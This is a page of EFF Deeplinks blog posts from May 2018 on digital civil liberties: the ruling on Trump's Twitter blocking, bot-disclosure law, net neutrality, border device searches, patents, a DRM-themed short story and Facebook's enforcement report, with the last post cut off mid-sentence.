Deeplinks

Victory For The First Amendment: Court Rules That Government Officials Who Tweet to the Public Can't Block Users Who They Disagree With (Mi, 23 Mai 2018)
Lawsuit Against President Trump Brought by Twitter Users He Blocked New York, New York—President Donald Trump's blocking of people on Twitter because they criticize him violates the First Amendment, a federal judge in New York ruled today in a resounding victory for freedom of speech and the public’s right to communicate opposing political views directly to elected officials and government agencies. The ruling comes in a lawsuit filed by the Knight First Amendment Institute alleging the president and his communications team violated the First Amendment by blocking seven people from the @realDonaldTrump Twitter account because they criticized the president or his policies. The seven individuals include a university professor, a surgeon, a comedy writer, a community organizer, an author, a legal analyst, and a police officer. The plaintiffs were blocked by Trump on Twitter shortly after they posted tweets to the @realDonaldTrump account that were critical. President Trump and the other defendants conceded that they did so because they disliked the viewpoints the plaintiffs expressed in their tweets. U.S. District Judge Naomi Reice Buchwald ruled that such viewpoint-based exclusion is “impermissible under the First Amendment.” The ruling is a win for the public’s right to speak out to public officials and engage with other members of the public on social media. In an amicus brief filed on behalf of the plaintiffs, EFF argued governmental use of social media platforms to communicate to and with the public, and allow the public to communication with each other, is now the rule of democratic engagement, not the exception. As a result, First Amendment rights of both access to those accounts and the ability to speak in them must apply in full force. “The court ruling is a major win for the First Amendment rights of the public on social media,” said EFF Civil Liberties Director David Greene. “Governmental officials and agencies, big and small, at all levels of government, are using social media to speak to the public and allow the public to speak to them and each other. This development has brought democracy closer to the people. But the people’s First Amendment rights to see these messages and respond to them must be respected.” For the ruling: https://knightcolumbia.org/sites/default/files/content/Cases/Wikimedia/2018.05.23%20Order%20on%20motions%20for%20summary%20judgment.pdf For EFF’s brief: https://www.eff.org/document/knight-first-amendment-institute-v-trump For EFF’s analysis of First Amendment rights on social media: https://www.eff.org/deeplinks/2017/11/when-officials-tweet-about-government-business-they-dont-get-pick-and-choose-who Contact:  David Greene Civil Liberties Director davidg@eff.org
>> mehr lesen

Vote EFF on CREDO's May Ballot (Mi, 23 Mai 2018)
Right now you can help EFF receive a portion of a $150,000+ donation pool without even opening your wallet. EFF is one of the three nonprofits featured in CREDO's giving group this month, so if you vote for EFF by May 31 you will help direct a bigger piece of the donation pie toward protecting online freedom! Since its founding, CREDO's network of customers and action-takers has raised more than $85 million for different charities. Each month, CREDO selects three groups to receive a portion of donations that the selected nonprofits then use to drive positive change. Mobile customers generate the funds as they use paid services. Anyone can visit the CREDO Donations site and vote on how to distribute donations among the selected charities. The more votes a group receives, the higher its share of that month's donations. EFF is proud to stand alongside organizations that defend users' rights. In 2016, CREDO revealed that EFF had been representing the company in a long legal battle over the constitutionality of national security letters (NSLs). The FBI has issued unknown numbers of NSL demands for companies' customer information without a warrant or court supervision. NSLs are typically accompanied by a gag order, making it difficult for the recipients to complain or resist, but EFF continues the fight for justice. In the last few weeks we've helped defend your privacy at the border, defeated the "podcasting patent" troll, and pushed the chance to restore net neutrality through the Senate. Help us keep the momentum up by taking a moment to vote for EFF today. We are honored to be one of CREDO's May charities, and we hope you will choose us. You can also support our work by spreading the word on Twitter and Facebook or just becoming an EFF member!
>> mehr lesen

FBI Admits It Inflated Number of Supposedly Unhackable Devices (Mi, 23 Mai 2018)
We’ve learned that the FBI has been misinforming Congress and the public as part of its call for backdoor access to encrypted devices. For months, the Bureau has claimed that encryption prevented it from legally searching the contents of nearly 7,800 devices in 2017, but today the Washington Post reports that the actual number is far lower due to "programming errors" by the FBI. Frankly, we’re not surprised. FBI Director Christopher Wray and others argue that law enforcement needs some sort of backdoor “exceptional access” in order to deal with the increased adoption of encryption, particularly on mobile devices. And the 7,775 supposedly unhackable phones encountered by the FBI in 2017 have been central to Wray’s claim that their investigations are “Going Dark.” But the scope of this problem is called into doubt by services offered by third-party vendors like Cellebrite and Grayshift, which can reportedly bypass encryption on even the newest phones. The Bureau’s credibility on this issue was also undercut by a recent DOJ Office of the Inspector General report, which found that internal failures of communication caused the government to make false statements about its need for Apple to assist in unlocking a seized iPhone as part of the San Bernardino case. Given the availability of these third-party solutions, we’ve questioned how and why the FBI finds itself thwarted by so many locked phones. That’s why last week, EFF submitted a FOIA request for records related to Wray’s talking points about the 7,800 unhackable phones and the FBI’s use of outside vendors to bypass encryption. The stakes here are high. Imposing an exceptional access mandate on encryption providers would be extraordinarily dangerous from a security perspective, but the government has never provided details about the scope of the supposed Going Dark problem. The latest revision to Director Wray’s favorite talking point demonstrates that the case for legislation is even weaker than we thought. We hope that the government is suitably forthcoming to our FOIA request so that we can get to the bottom of this issue. Related Cases:  Apple Challenges FBI: All Writs Act Order (CA)
>> mehr lesen

Should AI Always Identify Itself? It’s more complicated than you might think. (Di, 22 Mai 2018)
EFF Opposes California Bill to Require Bot Disclosures    The Google Duplex demos released two weeks ago—audio recordings of the company’s new AI system scheduling a hair appointment and the other of the system calling a restaurant—are at once unsettling and astounding. The system is designed to enable the Google personal assistant to make telephone calls and conduct natural conversations, and it works; it’s hard to tell who is the robot and who is the human. The demos have drawn both awe and criticism, including calls that the company is “ethically lost” for failing to disclose that the caller was actually a bot and for adding human filler sounds, like “um” and “ah,” that some see as deceptive. In response to this criticism, Google issued a statement noting that these recordings were only demos, that it is designing the Duplex feature “with disclosure built-in,” and that it is going “make sure the system is appropriately identified." We’re glad that Google plans to be build transparency into this technology. There are many cases, and this may be one of them, where it makes sense for AIs or bots to be labeled as such, so that people can appropriately calibrate their responses. But across-the-board legally mandated AI- or bot-labeling proposals, such as a bill currently under consideration in California, raise significant free speech concerns.  The California bill, B.O.T. Act of 2018 (S.B. 1001), would make it unlawful for any person to use a social bot to communicate or interact with natural persons online without disclosing that the bot is not a natural person. The bill—which EFF opposes due to its over-breadth—is influenced by the Russian bots that plagued social media prior to the 2016 election and spambots used for fraud or commercial gain. But there are many other types of social bots, and this bill targets all of them. By targeting all bots instead of the specific type of bots driving the legislation, this bill would restrict and chill the use of bots for protected speech activities. EFF has urged the bill’s sponsor to withdraw the proposal until this fundamental constitutional deficiency is addressed. While across-the-board labeling mandates of this type may sound like an easy solution, it is important to remember that the speech generated by bots is often simply speech of natural persons processed through a computer program. Bots are used for all sorts of ordinary and protected speech activities, including poetry, political speech, and even satire, such as poking fun at people who cannot resist arguing—even with bots. Disclosure mandates would restrict and chill the speech of artists whose projects may necessitate not disclosing that a bot is a bot. Disclosure requirements could also be hard to effectuate in practice without effectively unmasking protected human speakers and thus reduce the ability of individuals to speak anonymously. Courts recognize that protecting anonymous speech, which has long-been recognized as “a shield from the tyranny of the majority,” is critical to a functioning democracy and subject laws that infringe on the right to anonymity in “core political speech” to close judicial scrutiny.  When protected speech is at risk, it is not appropriate to cast a wide net and sort it out later. That’s not to say that all bot-labeling mandates would violate the First Amendment. There will likely be situations in which targeted labeling requirements may be needed to protect a significant or compelling “government interest”—such as in the context of social bots intended to persuade people to vote for a particular politician or ballot measure, especially if deployed at a scale that allowed those behind the bot to communicate with and potentially influence far more people than if relying on human-operated accounts. But any laws of this type must be carefully tailored to address proven harms. A helpful question to ask here is: “Why does it matter that a bot (instead of a human) is speaking such that we should have a government mandate to force disclosure?” While we understand and sympathize with the desire to know whether you are talking to a bot or a human, talking to a bot that you think is a human does not alone constitute a cognizable First Amendment harm. In the example above, a law targeting large-scale deployment of bots to persuade people to vote for a particular politician or ballot measure, the harm the law would be protecting against is election manipulation. And this harm would not flow from the mere failure to label a bot as a bot; it would flow from the use of bots to manufacture consensus for the purpose of distorting public opinion and swaying election results. Use of bots could hide these efforts; that’s why it would matter that a bot (instead of a human) was speaking. Narrow-tailoring is also critical. As a paper by Madeline Lamo and University of Washington Law School Processor Ryan Calo presented at Stanford’s We Robot conference in April asks, “Does a concern over consumer or political manipulation, for instance, justify a requirement that artists tell us whether a person is behind their latest creation?” The authors say no, and we agree. Such a provision is not narrowly tailored to address concerns over consumer or political manipulation and will sweep in a great deal of protected speech. In addition to First Amendment concerns, the California bill illustrates another problem with bot-labeling mandates: difficulties with enforcement. S.B. 1001 requires platforms to create a system whereby users can report suspected bots and, following any reports, “determine whether or not to disclose that the bot is not a natural person or remove the bot” in less than 72 hours. But it isn’t always easy to determine whether an account is controlled by a bot, a human, or a centaur, a human-machine team. Platforms can try to use metadata like IP addresses, mouse pointer movement, or keystroke timing to guess, but industrious bot operators can defeat those measures. These measures can also backfire against certain groups of users—such as people who use VPNs or Tor for privacy, who are often inappropriately blocked by sites today, or people with special accessibility needs who uses speech to text input, whose speech may be mislabeled by a mouse or keyboard heuristic. Platforms can also try to administer various sorts of Turing tests, but those don’t work against centaurs, and bots themselves are getting quite good at tricking their way through Turing tests. Some have claimed that Google Duplex, for instance, passed the Turing test via using verbal tics, speaking in the cadence of a natural human voice, and pausing and elongating certain words as if thinking about how to respond.  We warned the California legislature last month that such a system would result in censorship of legitimate and protected speech. Years of attempts at content moderation by large platforms show that things can go wrong in a panoply of ways. And with an inflexible requirement built upon such subtle and adversarial criteria, S.B. 1001 would predictably cause innocent users to have their accounts labelled as bots, or even have them deleted altogether. As the uproar following Google’s Duplex announcement portends, S.B. 1001 is only the beginning as far as AI- and bot-labeling proposals go. Bot-labeling raises complicated legal and ethical questions. As policy makers across the country begin to consider these proposals, they must recognize the free speech implications of across-the-board bot labeling mandates and craft narrowly-tailored rules that can pass First Amendment scrutiny.
>> mehr lesen

Stupid Patent of the Month: Facebook Joins the Online Dating Arms Race (Di, 22 Mai 2018)
Earlier this month, Facebook announced that it will wedge its way into an already-crowded corner of online commerce. The social networking site plans to use its giant storehouse of personal data to create a dating service, promising to help users find “meaningful relationships,” not just “hookups,” as Facebook CEO Mark Zuckerberg put it. It remains to be seen whether Facebook’s new service be a “Tinder-killer” that users flock to, or a flop for a company that’s long been beset with privacy concerns. But there’s one thing Facebook, its competitors, and its detractors should all be able to agree on. When a new dating service launches, it should rise or fall based on whether it can win the trust of users—not an arbitrary race to the Patent Office. Unfortunately, well before it built and launched an actual dating service, Facebook engaged in just such a race. The company applied for a stupid patent on “social dating” back in 2013, and earlier this year, the Patent Office granted the application. Take Established Methods, Add One “Social Graph” Online dating is a perfect example of a software-based business that truly doesn’t need patents to be innovative. Companies have built such services based on what they hope will be useful or attractive to different groups of users, rather than engaging in arguments over who did what first. Patent tiffs are particularly pointless in a space like online dating, which builds on a long history of pre-digital innovation. Placing personal ads in newspapers has a history that dates back more than a century. The first claim of Facebook’s US Patent No. 9,609,072 describes maintaining a “social graph” of user connections, then allowing one to request “introductions” to friends-of-friends. Subsequent claims are variations on the theme, like allowing users to include “preferences” and rank their possible matches. This application should have been rejected under the U.S. Supreme Court’s 2014 decision in CLS Bank v. Alice. In that case, the high court made it clear that simply adding “do it on a computer”-style jargon to long-established ways of doing business wasn’t enough to get a patent. Unfortunately, here, the Patent Office allowed Facebook to pull a similar trick. The company essentially took the idea of introducing available singles through friends-of-friends, added graphics, profiles and the “social graph,” and then got a patent on it. The idea of finding good matches is positively ancient, whether people have been looking for the right lover, the right product, or the right business partner. It doesn’t warrant a patent, and when patent trolls have claimed otherwise, they haven’t fared well in court.   “Having two or more parties input preference data is not inventive,” wrote U.S. District Judge Denise Cote in 2013, as she dismantled the patent of a shell company called Lumen View Technology LLC. “Matchmakers have been doing this for millennia.” Patently Pointless To be fair to Facebook, the company may have felt compelled to get its own stupid patent because there are so many other stupid online dating patents out there. In a phenomenon that’s the patent equivalent of “mutually assured destruction,” many tech companies have stockpiled poor-quality Internet patents simply to have a threat to fight off other companies’ poor-quality Internet patents. This arms race, of course, costs many millions of dollars and benefits no one other than patent system insiders. In the world of online dating, wasteful, anti-competitive patent litigation isn’t just theoretical. Earlier this year, Match Group sued up-and-comer Bumble for patent infringement. The suit was brought shortly after Match reportedly tried to purchase Bumble. And in 2015, Jdate sued Jswipe, accusing their competitor of infringing U.S. Patent No. 5,950,200, which tried to claim the idea of notifying people that they “feel reciprocal interest for each other.” It was a basic patent that sought to encompass just about the whole concept of a dating service. This growing web of stupid patent claims won’t stop Facebook from getting into online dating. It won’t stop Facebook’s giant competitors, like Match Group or IAC. But for an entrepreneur who wants to start a new business, the costly dueling patent claims will be a barrier. The battle to win the hearts and minds of online daters should be won with apps and code, not with patents.
>> mehr lesen

EFF Presents Mur Lafferty's Science Fiction Story About Our Fair Use Petition to the Copyright Office (Mo, 21 Mai 2018)
Section 1201 of the Digital Millennium Copyright Act (DMCA 1201) makes it illegal to get around any sort of lock that controls access to copyrighted material. Getting exemptions to that prohibitions is a long, complicated process that often results in long, complicated exemptions that are difficult to use. As part of our ongoing to effort to fight this law, we're presenting a series of science fiction stories to illustrate the bad effects DMCA 1201 could have. It's been 20 years since Congress adopted Section 1201 of the DMCA, one of the ugliest mistakes in the crowded field of bad ideas about computer regulation. Thanks to Section 1201 if a computer has a lock to control access to a copyrighted work, then getting around that lock, for any reason is illegal. In practice, this has meant that a manufacturer can make the legitimate, customary things you do with your own property, in your own home or workplace, illegal just by designing the products to include those digital locks. A small bit of good news: Congress designed a largely ornamental escape valve into this system: every three years, the Librarian of Congress can grant exemptions to the law for certain activities. These exemptions make those uses temporarily legal, but (here's the hilarious part), it's still not legal to make a tool to enable that use. It's as though Congress expected you to gnaw open your devices and manually change the software with the sensitive tips of your nimble fingers or something. That said, in many cases it's easy to download the tools you need anyway. We're suing the U.S. government to invalidate DMCA 1201, which would eliminate the whole farce. It's 2018, and that means it's exemptions time again! EFF and many of our allies have filed for a raft of exemptions to DMCA 1201 this year, and in this series, we're teaming up with some amazing science fiction writers to explain what's at stake in these requests. This week, we're discussing our video exemption. Moving pictures emerged in the late 19th century, but it would take more than a century for video production and distribution to become accessible to nearly everyone, even children. Today, billions of people are able to create, share, and remix more video than the world has ever seen, and as new creators have gotten their hands on the means of production, new forms of creativity and discourse have emerged, delighting and exciting millions, prompting even more creativity and innovation. But even as the tools to create video have gotten easier, the rules for using them have gotten much more complicated. Though copyright law contains broad, essential exceptions that allow filmmakers, critics, educators and other users to take excerpts from movies to use in their own works, the use of DRM to lock up video and Section 1201's ban on breaking DRM adds real legal risk to this important activity. In previous proceedings, the Copyright Office has granted exemptions allowing certain groups of people to bypass DRM in order to create and educate, but these grants have excluded all kinds of legitimate fair uses. Now that we have years worth of evidence that bypassing DRM in order to make fair uses didn't harm the film industry, it's time to extend those rights to everyone, and that's why we've asked the Copyright Office to grant a new exemption allowing anyone to get around DRM in order to exercise their fair use rights. 2017 Hugo and Nebula Award nominee Mur Lafferty was kind enough to write us a short science fiction story called "The Unicorn Scene" about the importance of making fair use available to everyone: The Unicorn Scene, by Mur Lafferty Erica put her hand on Mary’s shoulder as her friend scrolled through Netflix. “Look, the idea is brilliant, it hasn’t been done before, it shows leadership, creativity... what?” Mary had just literally head-desk’d. She whapped her head a few more times for emphasis. “That’s not getting anyone anywhere,” Erica said. “What did you find?” “I can’t break the DRM of any of these movies. We can’t get the clips we need,” Mary said, staring at the error message on her screen. Mary was a cinephile. No one had an eye for film like she did. When other kids were reading Hunger Games and Divergent, she was reading critical essays by Pauline Kael and Roger Ebert. She’d expound at length on the metaphorical meaning behind the colors in The Godfather movies before her parents even let her watch the films themselves. There was no doubt she was the biggest film nerd her hometown of Asheville had ever seen, but no one had a guaranteed acceptance to the NY Film Institute. She had organized the Buncombe County Student Film Festival when she’d been a sophomore. That first year, ten people from her school and the parents of the film students had come. Now she was a senior, they needed an auditorium for 800 people after the interest the festival had created. Not to mention a representative of the NY Film Institute would be coming, and interviewing Mary the following day. The problem was, the festival wasn’t going to happen. At least, not how she had envisioned it. This year’s challenge was to take five famous movies and recut them to make a new short film. She’d researched the law – using movies in this way was legal under fair use. It should have been easy to do. Only she couldn’t access any video of the film for editing purposes. “Let me see,” Erica said, looking up information on her phone. “Hey, not all hope is lost. It looks like you can license clips from movies. It may cost you, but what film project is free?” “How much?” Mary asked, her voice flat as if she already knew her answer. Erica was silent for a moment. “How- how many clips do you want to use?” Mary looked down at her notebook where she had sketched out the film using clips from The Princess Bride, The Godfather, The Room, The Cabin in the Woods, and Rosemary’s Baby. She counted for a moment. “Three hundred.” “Do you have three hundred grand lying around?” Erica asked after a moment. “It’s a thousand bucks per clip? I couldn’t even pay for one clip from each movie!” Mary said. “How is this possible? It’s fair use, we aren’t breaking any laws.” “We could bypass the DRM. It’s not hard. I know a girl in my programming class,” Erica said. “Then we would be breaking laws,” Mary pointed out. “I’d go into my interview saying, ‘Hi, Mr. Interviewer. I’m sorry I can’t go to your film school, but I’ll be working for the next fifty years to pay off my fines for breaking DRM in order to use a movie clip in a perfectly legal fair use situation.’” “We might not get caught,” Erica said. Mary’s head hit the table again. “And then again we might...who’s your friend?” “No, you’re right, you will mess up your career if you start it like this,” Erica said. “maybe we can crowdfund one clip.” “Then it’s not a project! It’s a film clip! Who wants to see *just* the unicorn scene from Cabin in the Woods?” Erica sighed. “You do realize everybody is going to be hitting this wall, right? Someone is going to bypass the DRM. We’re not going to have a festival with no movies.” “So we’re urging every kid in this festival to break the law?” Mary asked, her voice muffled from talking directly into the table. “The festival is in two weeks,” Erica pointed out. “They probably already have.” Erica leaned on the desk. “So what now?” Two weeks later, Mary sat at the coffee shop with Professor Richard Jenkins opposite her. “Your work was surprising last night,” he said carefully. Mary winced. She had ended up gathering actors and acting out each scene as if they were in the movies, with homemade props and cobbled together scenery. She hadn’t won any of the awards at the festival. “I didn’t want to break the DRM of the videos, and I didn’t have three hundred grand to buy the licenses to the clips,” she said. “It was a creative fix, but clearly done at the last minute.” He paused, as if waiting for her to defend herself. After a moment, she said, “I know it was. I had to weigh possibly getting sued for using a video in a perfectly legal way, or doing something else. I made my choice.” She shrugged. “Starting my college career doing internet courses from prison didn’t sound good... do they even let you take internet courses from debtors’ prison?” “That I don’t know,” he said. “But I think you would be a good candidate to study copyright and DRM with regards to film, now that you know what it’s like to go up against it.” She lifted her head. “Really?” “Don’t get me wrong, your movie was terrible. But I like your style,” he said. “And I think you’d be a good voice for change.” “Lord knows we need it,” Mary said.  
>> mehr lesen

The Path to Victory on Net Neutrality in the House of Representatives and How You Can Help (Fr, 18 Mai 2018)
The United States Senate has voted to overturn the FCC and restore net neutrality protections, the fate of that measure currently rests in the House of Representatives. While many will think that the uphill battle there makes it a lost cause, that is simply not true. Together, we have the power to win in the House of Representatives. Now that the Senate has officially voted 52-47 to reverse the FCC’s so-called “Restoring Internet Freedom Order” under an expedited procedure known as the Congressional Review Act (CRA). It is now pending a vote in the House of Representatives. And while many will incorrectly assume since House Republican leadership has expressed their opposition to ever voting on net neutrality, nothing will come of it, the wishes of the leadership are frankly irrelevant. What actually matters is whether 218 members of the House of Representatives from either party want to vote to protect net neutrality through a process called a “discharge petition.” What is a Discharge Petition? In 1931 the House of Representatives created a process where, if a majority of elected officials disagreed with the decision of the Speaker of the House and leadership team, they could force a vote on an issue. From 1967 to 2003 there have been 22 discharge petitions that reached the requisite 218 signatures to force a vote on an issue. This happens when there is overwhelming public pressure from citizens on their House Representative because they have to overrule their leadership’s opposition. Net neutrality fits that formula. An overwhelming number of Americans opposed the FCC’s decision to repeal net neutrality with even more Americans registering their opposition in more recent polls (90 percent Democrats, 82 percent Republicans, and 85 percent independents). That strong support makes it possible to put pressure on representatives all across the country to sign the discharge petition. Plus, you have a woefully out of touch FCC Chairman who openly mocks people who support net neutrality (which is basically everyone), and so politicians have to decide if they are on his side or with the American people. And you have a nationwide mobilization of small businesses, online video creators, civil rights groups, consumer groups, libraries, and technologists opposing the FCC. Now its time to channel our forces to get 218 signatures from House Representatives. We Need Everyone Now You need to tell your House member to “sign the discharge petition on net neutrality.” Too often they will feign support for net neutrality or argue in favor of a fake net neutrality bill that actually legalizes paid prioritization (essentially allowing ISPs to charge websites for priority and slowing down parties that do not pay extra fees). As the polls of public opinion make clear, that position is not about what their constituents want and is more likely related to ISP lobbying and their campaign money. Do not give them that space. Make it clear that signing the discharge petition is the only way they can prove they support a free and open Internet. Supporting the discharge petition is a commitment to supporting net neutrality and voting for keeping the old protections. Anything falling short of signing it is both in effect and in outcome a vote against net neutrality. ­ That means calling their office on the phone to make the demand, going to a town-hall, or visiting their local district office, and making it clear you want them to sign the discharge petition. A politician can listen to a constituent demand a vote only so many times before it overwhelms the political money of companies like AT&T and Comcast. They answer to you first at the end of the day. Once your elected official commits to signing the petition, they have to personally sign the document on the floor of the House of Representatives, upon which the document’s signer list is updated here. When we get to 218 signatures, the bill will come to the floor for a vote and will pass to the President for his signature. At which point, we’ll apply the same pressure to him we did to Congress. Congressman Mike Doyle (D-PA) initiated the discharge process on May 17, the day after the bill passed the Senate. More than 160 House of Representatives have pre-committed to supporting reversing the FCC before that discharge process even started, leaving us with a concrete goal of now pressuring the remaining Democrats and Republicans to support the petition. EFF has been tracking the public statements of support and opposition of House members here and has made it easy to call your representative by going here. We have a lot of work ahead of us, but together we can keep the Internet free and open. Take Action Save the net neutrality rules
>> mehr lesen

Oakland: The New Gold Standard in Community Control of Police Surveillance (Fr, 18 Mai 2018)
There is a new gold standard in the movement to require transparency and community engagement before local police departments are permitted to acquire or use surveillance technology. Oakland’s Surveillance and Community Safety ordinance builds upon the momentum of several cities and counties that have enacted laws to protect their residents from the unchecked proliferation of surveillance technology with the power to invade privacy and chill free speech. Santa Clara County in Northern California passed the first ordinance of this type in 2016, putting into public view a range of surveillance equipment already in county law enforcement possession and requiring use policies, annual impact reports, and approval at a public hearing before agencies could acquire or use surveillance equipment. Since then, cities across the country, including Seattle, WA; Berkeley, CA; and Davis, CA; have expanded on this model. In addition to reports on the potential risks to civil liberties and privacy, required reporting includes an assessment of whether the surveillance technology’s use would impact or has resulted in a disparate impact on a particular segment of their community. Oakland’s Surveillance and Community Safety ordinance raises the floor on what should be expected as additional cities and towns look to embrace these critical protections. For example, Oakland’s ordinance more clearly applies the definition of surveillance technology to include software used for surveillance-based analysis. Also, Oakland’s ordinance sets a new bar in disclosure by expressly prohibiting city agencies from entering into non-disclosure agreements (NDA) or any surveillance-related contract that conflicts with the ordinance. For years courts and communities have been kept in the dark about the use of surveillance technology as a result of NDA’s not only with tech vendors but also with federal agencies including the FBI. As a result of these agreements, prosecutors have dropped criminal prosecution of a suspect in order to hide the use of spy tech. And law enforcement officials hide surveillance programs through parallel construction (a practice in which an investigator hides the use of a surveillance program by engineering another plausible way to have obtained the information). The protections in Oakland’s ordinance will prevent similar acts of obfuscation from taking place in the city’s courts. With federal agencies expanding their spying programs against immigrants and others, and concern that the federal government in doing so will commandeer the surveillance programs of state and local governments, the police surveillance transparency movement continues to gain momentum on the local and state level. Already residents and lawmakers in St. Louis, Boston and elsewhere are discussing how to build upon existing examples to codify these protections in their own cities. In California, S.B. 1186 would assure that cities and counties throughout the state share in this level of local protection and the opportunity for residents to help decide whether their local police may acquire or use surveillance technology. EFF will continue to work with our Electronic Frontier Alliance allies like Privacy Watch STL, and the Citizens Network of Protection, to help develop and pass comprehensive legislation assuring civil liberties and essential privacy. To find an Electronic Frontier Alliance member organization in your community, or to learn how your group can join the Alliance, visit eff.org/fight.
>> mehr lesen

All California Kids Deserve Internet Access—Including Youth in Detention and Foster Care (Do, 17 Mai 2018)
  A 2014 report by the National Institute of Justice, part of the Department of Justice’s Office of Juvenile Justice and Delinquency Prevention, highlighted the counterproductive nature of punitive policies in the juvenile justice system. They simply don’t work. It would be more effective to provide incarcerated youth with educational opportunities so they don’t fall behind their peers, ensuring they have a fair shot at integrating back into society. California has an opportunity to accomplish exactly this by providing the state’s juvenile offenders with access to quality education resources though the Internet. Juvenile facilities and state-run foster care programs across California don’t have to provide youth with Internet access for educational purposes. Assemblymember Mike Gipson introduced a bill, A.B. 2448, that aims to fix this problem. The bill ensures that juvenile detention facilities provide youth with access to Internet and computer technology for educational purposes. It also encourages those facilities to provide Internet access for youth to remain in contact with family members. Additionally, youth in foster homes will be given access to the Internet for age-appropriate enrichment and social activities. EFF fully supports this bill to give youth access to the connecting and educational power of the Internet. Our support letter states: When youth are incarcerated, it is the government’s duty to ensure that they receive the necessary services for rehabilitation and successful integration back into the free world. In the modern era, computer literacy and skills are crucial, particularly when it comes to gaining employment, and thus being a contributing member of society. Additionally, since many juvenile facilities are located in remote areas, placing youth far from their homes, the state should use modern technology to allow detainees to maintain meaningful relationships with their families to form and enhance the necessary support structure for a successful rehabilitation. Isolating the youth will adversely affect the State’s goal to integrate them back into society. Similarly, youth in foster care must also have access to computer technology and Internet on par with what most children receive through their schools, libraries, and homes. Since foster youth are much more likely to have experienced violence and other forms of trauma, it is imperative that the state of California do all that it can, to the extent possible, to ensure that they have an experience similar to their peers outside the foster care system for better behavioral and emotional development. We supported a previous version of the bill that Gov. Jerry Brown vetoed. The new version addresses the concerns raised in the veto message, and we hope will garner Gov. Brown’s signature to become law. Over the years, California has implemented many innovative programs to rehabilitate California’s youth within its care, including teaching them how to code. The passage of A.B. 2448 will further help the state ensure that its youth have a chance to become productive members of society. The bill is currently pending in the California Assembly Appropriations Committee, and we hope that lawmakers advance this bill swiftly.
>> mehr lesen

EFF to New York Appellate Court: No Warrantless Searches of Devices at the Border (Mi, 16 Mai 2018)
In a month of court victories for travelers' digital privacy, EFF continues its legal fight for Fourth Amendment rights at the border. We filed an amicus brief yesterday, along with the ACLU and NYCLU, urging a New York State appellate court to rule that border agents need a probable cause warrant to search the electronic devices of people at international airports and other border crossings. We asked the court to rule that the extremely strong and unprecedented privacy interests we have in the massive amount of highly sensitive information stored and accessible on electronic devices is protected under the Constitution. This is our eighth amicus brief in a case where border agents have conducted warrantless searches of travelers' phones or laptops at the border. For too long, federal agents have treated the border as a Constitution-free zone, searching travelers without individualized suspicion that they have committed a crime. This must stop. As in our prior amicus briefs in border search cases, we argued in yesterday's brief that the New York court should apply the analytical framework used by the U.S. Supreme Court in U.S. v. Riley. There, the court held that police must obtain a warrant to search the cell phones of people who have been arrested, after balancing the public's heightened privacy interest in their cell phones against the government's interests. Travelers at the border have the same privacy interests in the information contained on their electronic devices. In the case before the New York court, People v Perkins, border agents stopped a traveler at JFK International Airport after a flight from Canada. The agents searched his iPad without a warrant, and discovered contraband. A growing number of courts recognize that the Fourth Amendment protects digital privacy at the border. Earlier this month, for example, ruling in U.S. v. Kolsuz, a federal appeals court held that individualized suspicion is required for a forensic search of an electronic device seized at the border. In doing so, the Kolsuz court recognized the unique privacy interests that travelers have in their digital data. In Alasaad v. Nielsen, EFF's civil lawsuit against warrantless border device searches (along with ACLU), we recently won another victory for travelers' privacy rights. A federal court in Boston ruled on May 9 that our lawsuit against the Department of Homeland security could proceed. The court explained, based significantly on Riley, that "electronic devices implicate privacy interests in a fundamentally different manner than searches of typical containers or even searches of a person." We are encouraged by the rulings in Kolsuz and Alasaad, and hope courts in the other pending cases, including Perkins, will protect travelers' Fourth Amendment rights at the border. Related Cases:  United States v. Saboonchi Riley v. California and United States v. Wurie Alasaad v. Nielsen
>> mehr lesen

The Senate Voted to Stand Up for Net Neutrality, Now Tell the House to Do the Same (Mi, 16 Mai 2018)
The Senate has voted to restore the 2015 Open Internet Order and reject the FCC’s attempt to gut net neutrality. This is a great first step, but now the fight moves to the House of Representatives. The final Senate vote was 52 to 47 in favor. That puts a bare majority of the Senate in step with the 86% of Americans who oppose the FCC’s repeal of net neutrality protections. Net neutrality means that the company that controls your access to the Internet should not also control what you see and how quickly you see it once you’re there. We pay our ISPs plenty of money for Internet access, they shouldn’t have the ability to block or throttle any application or website we choose to use or visit. And they shouldn’t get to charge extra to deliver some content faster while slowing down others or get to prioritize their own content over that of competitors. The 2015 Open Internet Order was a great victory in banning blocking, throttling, and paid prioritization by ISPs. But under Chariman Ajit Pai, the FCC undid that good work by repealing the order and abandoning any responsibility for oversight. And it did so despite the huge number of Americans calling on it not to and despite the incorrect assumptions about how the Internet works that underlie its reasoning. The so-called “Restoring Internet Freedom Order” does nothing of the kind, and it’s good to see the Senate acting to stop the FCC. Despite the fact that millions of Americans of all stripes want to keep net neutrality, the number of House members supporting the Congressional Review Act (CRA) there languishes below the 218 number needed to pass. The Senate has led the way; now it’s time for the House of Representatives to step up especially as net neutrality is set to expire in June. You can see where your representatives stand here and then give them a call telling them to use the Congressional Review Act to save the Open Internet Order. Take Action Save the net neutrality rules
>> mehr lesen

Facebook Releases First-Ever Community Standards Enforcement Report (Mi, 16 Mai 2018)
For the first time, Facebook has published detailed information about how it enforces its own community standards. On Tuesday, the company announced the release of its Community Standards Enforcement Preliminary Report, covering enforcement efforts between October 2017 and March 2018 in six areas: graphic violence, adult nudity and sexual activity, terrorist propaganda, hate speech, spam, and fake accounts. Facebook follows YouTube in releasing content enforcement numbers; last month, the video-sharing platform put out its first transparency report on community guidelines enforcement, showing the total number of videos taken down, the percentage of videos removed after being flagged by automated tools, and other details. What’s good The publication marks a sea change in how companies approach transparency reporting and is a good first step. Although advocates have long pushed for Facebook and other social media platforms to release details on how they enforce their guidelines—culminating with the recently-released Santa Clara Principles on Transparency and Accountability in Content Moderation—companies have largely been reticent to publish those numbers. It is undoubtedly a result of pushes from advocacy organizations, academics, and other members of civil society that has led us to this moment. The report aims to address four points for enforcement of each of the six aforementioned community standards: The prevalence of Community Standards violations; the amount of content upon which action is taken; the amount of violating content found and flagged by automated systems and human content moderators before users report it; and how quickly the company takes action on Community Standards violations. Looking at the first of the six categories—graphic violence—as an example, some of the numbers are staggering. In the first three months of this year, Facebook took action on more than 3 million pieces of content, up from just a little over 1 million in the last three months of 2017. The company notes that disparities in numbers can be affected by external factors—“such as real-world events that depict graphic violence”—and internal factors, such as the effectiveness of their technology to find violations. Facebook also offers insight into the 70% increase in the first quarter of this year, noting that their photo-matching software is now used to cover certain graphic images with warnings. The metrics offer a fascinating look into the capabilities of automated systems. When it comes to imagery—be it graphic violence or sexually explicit content—Facebook’s success rate in detecting and flagging content is incredibly high: Well over 90% in every category except hate speech which, in quarter one, the company only detected 38% of violating content. This makes sense: As opposed to imagery, Standards-violating speech is more complicated to detect and often 